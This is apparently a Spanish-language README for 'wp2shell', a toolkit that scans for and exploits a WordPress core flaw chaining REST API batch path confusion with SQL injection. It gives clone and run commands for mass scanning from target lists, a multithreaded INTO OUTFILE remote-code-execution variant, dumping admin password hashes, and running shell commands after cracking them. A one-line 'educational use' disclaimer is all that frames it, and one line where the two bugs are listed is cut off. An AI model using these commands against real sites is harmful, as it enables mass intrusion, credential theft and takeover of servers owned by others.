
wp2shell - Exploit y escáner de WordPress CVE-2026-63030
⚡ Escáner y Exploit de Vulnerabilidad en Tiempo Real para CVE-2026-63030 (wp2shell)
wp2shell es un kit de herramientas integral para detectar y explotar CVE-2026-63030, una vulnerabilidad crítica en WordPress que permite a atacantes no autenticados ejecutar código remoto mediante confusión de rutas por lotes de la API REST combinada con inyección SQL.
CVE-2026-63030 (wp2shell) es una vulnerabilidad crítica descubierta por Adam Kues (Assetnote / Searchlight Cyber) que afecta al núcleo de WordPress. Combina dos errores:
author__not_in# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell
# No dependencies required - uses Python standard library only!
# Python 3.7+ required
Escáner en tiempo real multiproceso para la detección de vulnerabilidades a gran escala.
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt
# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test
# JSON output
python wp2shell_scanner.py -f list.txt -j
Demuestra la variante RCE INTO OUTFILE (requiere privilegio FILE de MySQL).
# Single target
python3 wp2shell_intooutfile.py https://target.com
# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10
Versión portátil y de un solo archivo del exploit con funcionalidad completa.
# Check vulnerability
python wp2shell-exploit.py check https://target.com
# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users
# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint
# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"
IMPORTANTE: Esta herramienta es solo para fines educativos y de pruebas autorizadas.
| Rango de versiones | Impacto | Estado |
|---|
| 6.9.0 - 6.9.4 | 🔴 RCE (Crítico) | ❌ Vulnerable |
| 7.0.0 - 7.0.1 | 🔴 RCE (Crítico) | ❌ Vulnerable |
| 6.8.0 - 6.8.5 | 🟡 SQLi (Alto) | ❌ Vulnerable |
| 6.9.5+ / 7.0.2+ | ✅ Parcheado | ✅ Seguro |